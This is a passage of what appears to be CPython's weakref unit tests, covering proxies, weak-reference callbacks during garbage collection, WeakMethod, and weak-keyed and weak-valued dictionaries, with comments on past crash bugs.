def check_shared_without_callback(self, makeref):
o = Object(1)
p1 = makeref(o, None)
p2 = makeref(o, None)
self.assertIs(p1, p2, "both callbacks were None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o, None)
self.assertIs(p1, p2, "callbacks were NULL, None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o)
self.assertIs(p1, p2, "both callbacks were NULL in the C API")
del p1, p2
p1 = makeref(o, None)
p2 = makeref(o)
self.assertIs(p1, p2, "callbacks were None, NULL in the C API")
def test_callable_proxy(self):
o = Callable()
ref1 = weakref.proxy(o)
self.check_proxy(o, ref1)
self.assertIs(type(ref1), weakref.CallableProxyType,
"proxy is not of callable type")
ref1('twinkies!')
self.assertEqual(o.bar, 'twinkies!',
"call through proxy not passed through to original")
ref1(x='Splat.')
self.assertEqual(o.bar, 'Splat.',
"call through proxy not passed through to original")
# expect due to too few args
self.assertRaises(TypeError, ref1)
# expect due to too many args
self.assertRaises(TypeError, ref1, 1, 2, 3)
def check_proxy(self, o, proxy):
o.foo = 1
self.assertEqual(proxy.foo, 1,
"proxy does not reflect attribute addition")
o.foo = 2
self.assertEqual(proxy.foo, 2,
"proxy does not reflect attribute modification")
del o.foo
self.assertFalse(hasattr(proxy, 'foo'),
"proxy does not reflect attribute removal")
proxy.foo = 1
self.assertEqual(o.foo, 1,
"object does not reflect attribute addition via proxy")
proxy.foo = 2
self.assertEqual(o.foo, 2,
"object does not reflect attribute modification via proxy")
del proxy.foo
self.assertFalse(hasattr(o, 'foo'),
"object does not reflect attribute removal via proxy")
def test_proxy_deletion(self):
# Test clearing of SF bug #762891
class Foo:
result = None
def __delitem__(self, accessor):
self.result = accessor
g = Foo()
f = weakref.proxy(g)
del f[0]
self.assertEqual(f.result, 0)
def test_proxy_bool(self):
# Test clearing of SF bug #1170766
class List(list): pass
lyst = List()
self.assertEqual(bool(weakref.proxy(lyst)), bool(lyst))
def test_proxy_iter(self):
# Test fails with a debug build of the interpreter
# (see bpo-38395).
obj = None
class MyObj:
def __iter__(self):
nonlocal obj
del obj
return NotImplemented
obj = MyObj()
p = weakref.proxy(obj)
with self.assertRaises(TypeError):
# "blech" in p calls MyObj.__iter__ through the proxy,
# without keeping a reference to the real object, so it
# can be killed in the middle of the call
"blech" in p
def test_getweakrefcount(self):
o = C()
ref1 = weakref.ref(o)
ref2 = weakref.ref(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 2,
"got wrong number of weak reference objects")
proxy1 = weakref.proxy(o)
proxy2 = weakref.proxy(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 4,
"got wrong number of weak reference objects")
del ref1, ref2, proxy1, proxy2
self.assertEqual(weakref.getweakrefcount(o), 0,
"weak reference objects not unlinked from"
" referent when discarded.")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefcount(1), 0,
"got wrong number of weak reference objects for int")
def test_getweakrefs(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref1
self.assertEqual(weakref.getweakrefs(o), [ref2],
"list of refs does not match")
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref2
self.assertEqual(weakref.getweakrefs(o), [ref1],
"list of refs does not match")
del ref1
self.assertEqual(weakref.getweakrefs(o), [],
"list of refs not cleared")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefs(1), [],
"list of refs does not match for int")
def test_newstyle_number_ops(self):
class F(float):
pass
f = F(2.0)
p = weakref.proxy(f)
self.assertEqual(p + 1.0, 3.0)
self.assertEqual(1.0 + p, 3.0) # this used to SEGV
def test_callbacks_protected(self):
# Callbacks protected from already-set exceptions?
# Regression test for SF bug #478534.
class BogusError(Exception):
pass
data = {}
def remove(k):
del data[k]
def encapsulate():
f = lambda : ()
data[weakref.ref(f, remove)] = None
raise BogusError
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
def test_sf_bug_840829(self):
# "weakref callbacks and gc corrupt memory"
# subtype_dealloc erroneously exposed a new-style instance
# already in the process of getting deallocated to gc,
# causing double-deallocation if the instance had a weakref
# callback that triggered gc.
# If the bug exists, there probably won't be an obvious symptom
# in a release build. In a debug build, a segfault will occur
# when the second attempt to remove the instance from the "list
# of all objects" occurs.
import gc
class C(object):
pass
c = C()
wr = weakref.ref(c, lambda ignore: gc.collect())
del c
# There endeth the first part. It gets worse.
del wr
c1 = C()
c1.i = C()
wr = weakref.ref(c1.i, lambda ignore: gc.collect())
c2 = C()
c2.c1 = c1
del c1 # still alive because c2 points to it
# Now when subtype_dealloc gets called on c2, it's not enough just
# that c2 is immune from gc while the weakref callbacks associated
# with c2 execute (there are none in this 2nd half of the test, btw).
# subtype_dealloc goes on to call the base classes' deallocs too,
# so any gc triggered by weakref callbacks associated with anything
# torn down by a base class dealloc can also trigger double
# deallocation of c2.
del c2
def test_callback_in_cycle_1(self):
import gc
class J(object):
pass
class II(object):
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
# Now J and II are each in a self-cycle (as all new-style class
# objects are, since their __mro__ points back to them). I holds
# both a weak reference (I.wr) and a strong reference (I.J) to class
# J. I is also in a cycle (I.wr points to a weakref that references
# I.acallback). When we del these three, they all become trash, but
# the cycles prevent any of them from getting cleaned up immediately.
# Instead they have to wait for cyclic gc to deduce that they're
# trash.
#
# gc used to call tp_clear on all of them, and the order in which
# it does that is pretty accidental. The exact order in which we
# built up these things manages to provoke gc into running tp_clear
# in just the right order (I last). Calling tp_clear on II leaves
# behind an insane class object (its __mro__ becomes NULL). Calling
# tp_clear on J breaks its self-cycle, but J doesn't get deleted
# just then because of the strong reference from I.J. Calling
# tp_clear on I starts to clear I's __dict__, and just happens to
# clear I.J first -- I.wr is still intact. That removes the last
# reference to J, which triggers the weakref callback. The callback
# tries to do "self.J", and instances of new-style classes look up
# attributes ("J") in the class dict first. The class (II) wants to
# search II.__mro__, but that's NULL. The result was a segfault in
# a release build, and an assert failure in a debug build.
del I, J, II
gc.collect()
def test_callback_in_cycle_2(self):
import gc
# This is just like test_callback_in_cycle_1, except that II is an
# old-style class. The symptom is different then: an instance of an
# old-style class looks in its own __dict__ first. 'J' happens to
# get cleared from I.__dict__ before 'wr', and 'J' was never in II's
# __dict__, so the attribute isn't found. The difference is that
# the old-style II doesn't have a NULL __mro__ (it doesn't have any
# __mro__), so no segfault occurs. Instead it got:
# test_callback_in_cycle_2 (__main__.ReferencesTestCase) ...
# Exception exceptions.AttributeError:
# "II instance has no attribute 'J'" in <bound method II.acallback
# of <?.II instance at 0x00B9B4B8>> ignored
class J(object):
pass
class II:
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
del I, J, II
gc.collect()
def test_callback_in_cycle_3(self):
import gc
# This one broke the first patch that fixed the last two. In this
# case, the objects reachable from the callback aren't also reachable
# from the object (c1) *triggering* the callback: you can get to
# c1 from c2, but not vice-versa. The result was that c2's __dict__
# got tp_clear'ed by the time the c2.cb callback got invoked.
class C:
def cb(self, ignore):
self.me
self.c1
self.wr
c1, c2 = C(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2
gc.collect()
def test_callback_in_cycle_4(self):
import gc
# Like test_callback_in_cycle_3, except c2 and c1 have different
# classes. c2's class (C) isn't reachable from c1 then, so protecting
# objects reachable from the dying object (c1) isn't enough to stop
# c2's class (C) from getting tp_clear'ed before c2.cb is invoked.
# The result was a segfault (C.__mro__ was NULL when the callback
# tried to look up self.me).
class C(object):
def cb(self, ignore):
self.me
self.c1
self.wr
class D:
pass
c1, c2 = D(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2, C, D
gc.collect()
def test_callback_in_cycle_resurrection(self):
import gc
# Do something nasty in a weakref callback: resurrect objects
# from dead cycles. For this to be attempted, the weakref and
# its callback must also be part of the cyclic trash (else the
# objects reachable via the callback couldn't be in cyclic trash
# to begin with -- the callback would act like an external root).
# But gc clears trash weakrefs with callbacks early now, which
# disables the callbacks, so the callbacks shouldn't get called
# at all (and so nothing actually gets resurrected).
alist = []
class C(object):
def __init__(self, value):
self.attribute = value
def acallback(self, ignore):
alist.append(self.c)
c1, c2 = C(1), C(2)
c1.c = c2
c2.c = c1
c1.wr = weakref.ref(c2, c1.acallback)
c2.wr = weakref.ref(c1, c2.acallback)
def C_went_away(ignore):
alist.append("C went away")
wr = weakref.ref(C, C_went_away)
del c1, c2, C # make them all trash
self.assertEqual(alist, []) # del isn't enough to reclaim anything
gc.collect()
# c1.wr and c2.wr were part of the cyclic trash, so should have
# been cleared without their callbacks executing. OTOH, the weakref
# to C is bound to a function local (wr), and wasn't trash, so that
# callback should have been invoked when C went away.
self.assertEqual(alist, ["C went away"])
# The remaining weakref should be dead now (its callback ran).
self.assertEqual(wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_callbacks_on_callback(self):
import gc
# Set up weakref callbacks *on* weakref callbacks.
alist = []
def safe_callback(ignore):
alist.append("safe_callback called")
class C(object):
def cb(self, ignore):
alist.append("cb called")
c, d = C(), C()
c.other = d
d.other = c
callback = c.cb
c.wr = weakref.ref(d, callback) # this won't trigger
d.wr = weakref.ref(callback, d.cb) # ditto
external_wr = weakref.ref(callback, safe_callback) # but this will
self.assertIs(external_wr(), callback)
# The weakrefs attached to c and d should get cleared, so that
# C.cb is never called. But external_wr isn't part of the cyclic
# trash, and no cyclic trash is reachable from it, so safe_callback
# should get invoked when the bound method object callback (c.cb)
# -- which is itself a callback, and also part of the cyclic trash --
# gets reclaimed at the end of gc.
del callback, c, d, C
self.assertEqual(alist, []) # del isn't enough to clean up cycles
gc.collect()
self.assertEqual(alist, ["safe_callback called"])
self.assertEqual(external_wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_gc_during_ref_creation(self):
self.check_gc_during_creation(weakref.ref)
def test_gc_during_proxy_creation(self):
self.check_gc_during_creation(weakref.proxy)
def check_gc_during_creation(self, makeref):
thresholds = gc.get_threshold()
gc.set_threshold(1, 1, 1)
gc.collect()
class A:
pass
def callback(*args):
pass
referenced = A()
a = A()
a.a = a
a.wr = makeref(referenced)
try:
# now make sure the object and the ref get labeled as
# cyclic trash:
a = A()
weakref.ref(referenced, callback)
finally:
gc.set_threshold(*thresholds)
def test_ref_created_during_del(self):
# Bug #1377858
# A weakref created in an object's __del__() would crash the
# interpreter when the weakref was cleaned up since it would refer to
# non-existent memory. This test should not segfault the interpreter.
class Target(object):
def __del__(self):
global ref_from_del
ref_from_del = weakref.ref(self)
w = Target()
def test_init(self):
# Issue 3634
# <weakref to class>.__init__() doesn't check errors correctly
r = weakref.ref(Exception)
self.assertRaises(TypeError, r.__init__, 0, 0, 0, 0, 0)
# No exception should be raised here
gc.collect()
def test_classes(self):
# Check that classes are weakrefable.
class A(object):
pass
l = []
weakref.ref(int)
a = weakref.ref(A, l.append)
A = None
gc.collect()
self.assertEqual(a(), None)
self.assertEqual(l, [a])
def test_equality(self):
# Alive weakrefs defer equality testing to their underlying object.
x = Object(1)
y = Object(1)
z = Object(2)
a = weakref.ref(x)
b = weakref.ref(y)
c = weakref.ref(z)
d = weakref.ref(x)
# Note how we directly test the operators here, to stress both
# __eq__ and __ne__.
self.assertTrue(a == b)
self.assertFalse(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertTrue(a == d)
self.assertFalse(a != d)
self.assertFalse(a == x)
self.assertTrue(a != x)
self.assertTrue(a == ALWAYS_EQ)
self.assertFalse(a != ALWAYS_EQ)
del x, y, z
gc.collect()
for r in a, b, c:
# Sanity check
self.assertIs(r(), None)
# Dead weakrefs compare by identity: whether `a` and `d` are the
# same weakref object is an implementation detail, since they pointed
# to the same original object and didn't have a callback.
# (see issue #16453).
self.assertFalse(a == b)
self.assertTrue(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertEqual(a == d, a is d)
self.assertEqual(a != d, a is not d)
def test_ordering(self):
# weakrefs cannot be ordered, even if the underlying objects can.
ops = [operator.lt, operator.gt, operator.le, operator.ge]
x = Object(1)
y = Object(1)
a = weakref.ref(x)
b = weakref.ref(y)
for op in ops:
self.assertRaises(TypeError, op, a, b)
# Same when dead.
del x, y
gc.collect()
for op in ops:
self.assertRaises(TypeError, op, a, b)
def test_hashing(self):
# Alive weakrefs hash the same as the underlying object
x = Object(42)
y = Object(42)
a = weakref.ref(x)
b = weakref.ref(y)
self.assertEqual(hash(a), hash(42))
del x, y
gc.collect()
# Dead weakrefs:
        # - retain their hash if they were hashed when alive;
# - otherwise, cannot be hashed.
self.assertEqual(hash(a), hash(42))
self.assertRaises(TypeError, hash, b)
def test_trashcan_16602(self):
# Issue #16602: when a weakref's target was part of a long
# deallocation chain, the trashcan mechanism could delay clearing
# of the weakref and make the target object visible from outside
# code even though its refcount had dropped to 0. A crash ensued.
class C:
def __init__(self, parent):
if not parent:
return
wself = weakref.ref(self)
def cb(wparent):
o = wself()
self.wparent = weakref.ref(parent, cb)
d = weakref.WeakKeyDictionary()
root = c = C(None)
for n in range(100):
d[c] = c = C(c)
del root
gc.collect()
def test_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
self.assertIs(ref1.__callback__, callback)
ref2 = weakref.ref(x)
self.assertIsNone(ref2.__callback__)
def test_callback_attribute_after_deletion(self):
x = Object(1)
ref = weakref.ref(x, self.callback)
self.assertIsNotNone(ref.__callback__)
del x
support.gc_collect()
self.assertIsNone(ref.__callback__)
def test_set_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
with self.assertRaises(AttributeError):
ref1.__callback__ = lambda ref: None
def test_callback_gcs(self):
class ObjectWithDel(Object):
def __del__(self): pass
x = ObjectWithDel(1)
ref1 = weakref.ref(x, lambda ref: support.gc_collect())
del x
support.gc_collect()
class SubclassableWeakrefTestCase(TestBase):
def test_subclass_refs(self):
class MyRef(weakref.ref):
def __init__(self, ob, callback=None, value=42):
self.value = value
super().__init__(ob, callback)
def __call__(self):
self.called = True
return super().__call__()
o = Object("foo")
mr = MyRef(o, value=24)
self.assertIs(mr(), o)
self.assertTrue(mr.called)
self.assertEqual(mr.value, 24)
del o
self.assertIsNone(mr())
self.assertTrue(mr.called)
def test_subclass_refs_dont_replace_standard_refs(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o)
r2 = weakref.ref(o)
self.assertIsNot(r1, r2)
self.assertEqual(weakref.getweakrefs(o), [r2, r1])
self.assertEqual(weakref.getweakrefcount(o), 2)
r3 = MyRef(o)
self.assertEqual(weakref.getweakrefcount(o), 3)
refs = weakref.getweakrefs(o)
self.assertEqual(len(refs), 3)
self.assertIs(r2, refs[0])
self.assertIn(r1, refs[1:])
self.assertIn(r3, refs[1:])
def test_subclass_refs_dont_conflate_callbacks(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o, id)
r2 = MyRef(o, str)
self.assertIsNot(r1, r2)
refs = weakref.getweakrefs(o)
self.assertIn(r1, refs)
self.assertIn(r2, refs)
def test_subclass_refs_with_slots(self):
class MyRef(weakref.ref):
__slots__ = "slot1", "slot2"
def __new__(type, ob, callback, slot1, slot2):
return weakref.ref.__new__(type, ob, callback)
def __init__(self, ob, callback, slot1, slot2):
self.slot1 = slot1
self.slot2 = slot2
def meth(self):
return self.slot1 + self.slot2
o = Object(42)
r = MyRef(o, None, "abc", "def")
self.assertEqual(r.slot1, "abc")
self.assertEqual(r.slot2, "def")
self.assertEqual(r.meth(), "abcdef")
self.assertFalse(hasattr(r, "__dict__"))
def test_subclass_refs_with_cycle(self):
"""Confirm https://bugs.python.org/issue3100 is fixed."""
# An instance of a weakref subclass can have attributes.
# If such a weakref holds the only strong reference to the object,
# deleting the weakref will delete the object. In this case,
# the callback must not be called, because the ref object is
# being deleted.
class MyRef(weakref.ref):
pass
# Use a local callback, for "regrtest -R::"
# to detect refcounting problems
def callback(w):
self.cbcalled += 1
o = C()
r1 = MyRef(o, callback)
r1.o = o
del o
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
# Same test, with two weakrefs to the same object
# (since code paths are different)
o = C()
r1 = MyRef(o, callback)
r2 = MyRef(o, callback)
r1.r = r2
r2.o = o
del o
del r2
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
class WeakMethodTestCase(unittest.TestCase):
def _subclass(self):
"""Return an Object subclass overriding `some_method`."""
class C(Object):
def some_method(self):
return 6
return C
def test_alive(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
self.assertIsInstance(r, weakref.ReferenceType)
self.assertIsInstance(r(), type(o.some_method))
self.assertIs(r().__self__, o)
self.assertIs(r().__func__, o.some_method.__func__)
self.assertEqual(r()(), 4)
def test_object_dead(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
del o
gc.collect()
self.assertIs(r(), None)
def test_method_dead(self):
C = self._subclass()
o = C(1)
r = weakref.WeakMethod(o.some_method)
del C.some_method
gc.collect()
self.assertIs(r(), None)
def test_callback_when_object_dead(self):
# Test callback behaviour when object dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del o
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
C.some_method = Object.some_method
gc.collect()
self.assertEqual(calls, [r])
def test_callback_when_method_dead(self):
# Test callback behaviour when method dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del C.some_method
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
del o
gc.collect()
self.assertEqual(calls, [r])
@support.cpython_only
def test_no_cycles(self):
# A WeakMethod doesn't create any reference cycle to itself.
o = Object(1)
def cb(_):
pass
r = weakref.WeakMethod(o.some_method, cb)
wr = weakref.ref(r)
del r
self.assertIs(wr(), None)
def test_equality(self):
def _eq(a, b):
self.assertTrue(a == b)
self.assertFalse(a != b)
def _ne(a, b):
self.assertTrue(a != b)
self.assertFalse(a == b)
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(x.other_method)
d = weakref.WeakMethod(y.other_method)
# Objects equal, same method
_eq(a, b)
_eq(c, d)
# Objects equal, different method
_ne(a, c)
_ne(a, d)
_ne(b, c)
_ne(b, d)
# Objects unequal, same or different method
z = Object(2)
e = weakref.WeakMethod(z.some_method)
f = weakref.WeakMethod(z.other_method)
_ne(a, e)
_ne(a, f)
_ne(b, e)
_ne(b, f)
# Compare with different types
_ne(a, x.some_method)
_eq(a, ALWAYS_EQ)
del x, y, z
gc.collect()
# Dead WeakMethods compare by identity
refs = a, b, c, d, e, f
for q in refs:
for r in refs:
self.assertEqual(q == r, q is r)
self.assertEqual(q != r, q is not r)
def test_hashing(self):
# Alive WeakMethods are hashable if the underlying object is
# hashable.
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(y.other_method)
# Since WeakMethod objects are equal, the hashes should be equal.
self.assertEqual(hash(a), hash(b))
ha = hash(a)
# Dead WeakMethods retain their old hash value
del x, y
gc.collect()
self.assertEqual(hash(a), ha)
self.assertEqual(hash(b), ha)
# If it wasn't hashed when alive, a dead WeakMethod cannot be hashed.
self.assertRaises(TypeError, hash, c)
def test_extend_repr(self):
class ExtendRef(weakref.ref):
            def __repr__(self):
                return "<ExtendRef to %r>" % (self(),)
        # Live weak ref
        a = Object(1)
        ra = ExtendRef(a)
        self.assertIn("ExtendRef", repr(ra))
        # Dead weak ref
        b = Object(1)
        rb = ExtendRef(b)
        del b
        gc.collect()
        self.assertIn("ExtendRef", repr(rb))
class MappingTestCase(TestBase):
COUNT = 10
def check_len_cycles(self, dict_type, cons):
N = 20
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
# Keep an iterator alive
it = dct.items()
try:
next(it)
except StopIteration:
pass
del items
gc.collect()
n1 = len(dct)
del it
gc.collect()
n2 = len(dct)
# one item may be kept alive inside the iterator
self.assertIn(n1, (0, 1))
self.assertEqual(n2, 0)
def test_weak_keyed_len_cycles(self):
self.check_len_cycles(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_cycles(self):
self.check_len_cycles(weakref.WeakValueDictionary, lambda k: (1, k))
def check_len_race(self, dict_type, cons):
# Extended sanity checks for len() in the face of cyclic collection
self.addCleanup(gc.set_threshold, *gc.get_threshold())
for th in range(1, 100):
N = 20
gc.collect(0)
gc.set_threshold(th, th, th)
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
del items
# All items will be collected at next garbage collection pass
it = dct.items()
try:
next(it)
except StopIteration:
pass
n1 = len(dct)
del it
n2 = len(dct)
self.assertGreaterEqual(n1, 0)
self.assertLessEqual(n1, N)
self.assertGreaterEqual(n2, 0)
self.assertLessEqual(n2, n1)
def test_weak_keyed_len_race(self):
self.check_len_race(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_race(self):
self.check_len_race(weakref.WeakValueDictionary, lambda k: (1, k))
def test_weak_values(self):
#
# This exercises d.copy(), d.items(), d[], del d[], len(d).
#
dict, objects = self.make_weak_valued_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1)
self.assertIs(o, dict[o.arg],
"wrong object returned by weak dict!")
items1 = list(dict.items())
items2 = list(dict.copy().items())
items1.sort()
items2.sort()
self.assertEqual(items1, items2,
"cloning of weak-valued dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), self.COUNT - 1,
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the values did not clear the dictionary")
# regression on SF bug #447152:
dict = weakref.WeakValueDictionary()
self.assertRaises(KeyError, dict.__getitem__, 1)
dict[2] = C()
self.assertRaises(KeyError, dict.__getitem__, 2)
def test_weak_keys(self):
#
# This exercises d.copy(), d.items(), d[] = v, d[], del d[],
# len(d), k in d.
#
dict, objects = self.make_weak_keyed_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong number of weak references to %r!" % o)
self.assertIs(o.arg, dict[o],
"wrong object returned by weak dict!")
items1 = dict.items()
items2 = dict.copy().items()
self.assertEqual(set(items1), set(items2),
"cloning of weak-keyed dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), (self.COUNT - 1),
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the keys did not clear the dictionary")
o = Object(42)
dict[o] = "What is the meaning of the universe?"
self.assertIn(o, dict)
self.assertNotIn(34, dict)
def test_weak_keyed_iters(self):
dict, objects = self.make_weak_keyed_dict()
self.check_iters(dict)
# Test keyrefs()
refs = dict.keyrefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test iterkeyrefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.keyrefs())), len(objects))
for wr in dict.keyrefs():
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def test_weak_valued_iters(self):
dict, objects = self.make_weak_valued_dict()
self.check_iters(dict)
# Test valuerefs()
refs = dict.valuerefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test itervaluerefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.itervaluerefs())), len(objects))
for wr in dict.itervaluerefs():
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def check_iters(self, dict):
# item iterator:
items = list(dict.items())
for item in dict.items():
items.remove(item)
self.assertFalse(items, "items() did not touch all items")
# key iterator, via __iter__():
keys = list(dict.keys())
for k in dict:
keys.remove(k)
self.assertFalse(keys, "__iter__() did not touch all keys")
# key iterator, via iterkeys():
keys = list(dict.keys())
for k in dict.keys():
keys.remove(k)
self.assertFalse(keys, "iterkeys() did not touch all keys")
# value iterator:
values = list(dict.values())
for v in dict.values():
values.remove(v)
self.assertFalse(values,
"itervalues() did not touch all values")
def check_weak_destroy_while_iterating(self, dict, objects, iter_name):
n = len(dict)
it = iter(getattr(dict, iter_name)())
next(it) # Trigger internal iteration
# Destroy an object
del objects[-1]
gc.collect() # just in case
# We have removed either the first consumed object, or another one
self.assertIn(len(list(it)), [len(objects), len(objects) - 1])
del it
# The removal has been committed
self.assertEqual(len(dict), n - 1)
def check_weak_destroy_and_mutate_while_iterating(self, dict, testcontext):
# Check that we can explicitly mutate the weak dict without
# interfering with delayed removal.
# `testcontext` should create an iterator, destroy one of the
# weakref'ed objects and then return a new key/value pair corresponding
# to the destroyed object.
with testcontext() as (k, v):
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.__delitem__, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.pop, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
dict[k] = v
self.assertEqual(dict[k], v)
ddict = copy.copy(dict)
with testcontext() as (k, v):
dict.update(ddict)
self.assertEqual(dict, ddict)
with testcontext() as (k, v):
dict.clear()
self.assertEqual(len(dict), 0)
def check_weak_del_and_len_while_iterating(self, dict, testcontext):
# Check that len() works when both iterating and removing keys
# explicitly through various means (.pop(), .clear()...), while
# implicit mutation is deferred because an iterator is alive.
# (each call to testcontext() should schedule one item for removal
# for this test to work properly)
o = Object(123456)
with testcontext():
n = len(dict)
            # Since underlying dict is ordered, first item is popped
dict.pop(next(dict.keys()))
self.assertEqual(len(dict), n - 1)
dict[o] = o
self.assertEqual(len(dict), n)
# last item in objects is removed from dict in context shutdown
with testcontext():
self.assertEqual(len(dict), n - 1)
# Then, (o, o) is popped
dict.popitem()
self.assertEqual(len(dict), n - 2)
with testcontext():
self.assertEqual(len(dict), n - 3)
del dict[next(dict.keys())]
self.assertEqual(len(dict), n - 4)
with testcontext():
self.assertEqual(len(dict), n - 5)
dict.popitem()
self.assertEqual(len(dict), n - 6)
with testcontext():
dict.clear()
self.assertEqual(len(dict), 0)
self.assertEqual(len(dict), 0)
def test_weak_keys_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_keyed_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'keyrefs')
dict, objects = self.make_weak_keyed_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
v = objects.pop().arg
gc.collect() # just in case
yield Object(v), v
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
# Issue #21173: len() fragile when keys are both implicitly and
# explicitly removed.
dict, objects = self.make_weak_keyed_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_weak_values_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_valued_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'itervaluerefs')
self.check_weak_destroy_while_iterating(dict, objects, 'valuerefs')
dict, objects = self.make_weak_valued_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
k = objects.pop().arg
gc.collect() # just in case
yield k, Object(k)
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
dict, objects = self.make_weak_valued_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_make_weak_keyed_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
self.assertEqual(dict[o], 364)
def test_make_weak_keyed_dict_from_weak_keyed_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
dict2 = weakref.WeakKeyDictionary(dict)
self.assertEqual(dict[o], 364)
def make_weak_keyed_dict(self):
dict = weakref.WeakKeyDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o] = o.arg
return dict, objects
def test_make_weak_valued_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_from_weak_valued_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
dict2 = weakref.WeakValueDictionary(dict)
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_misc(self):
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.__init__)
self.assertRaises(TypeError, weakref.WeakValueDictionary, {}, {})
self.assertRaises(TypeError, weakref.WeakValueDictionary, (), ())
# special keyword arguments
o = Object(3)
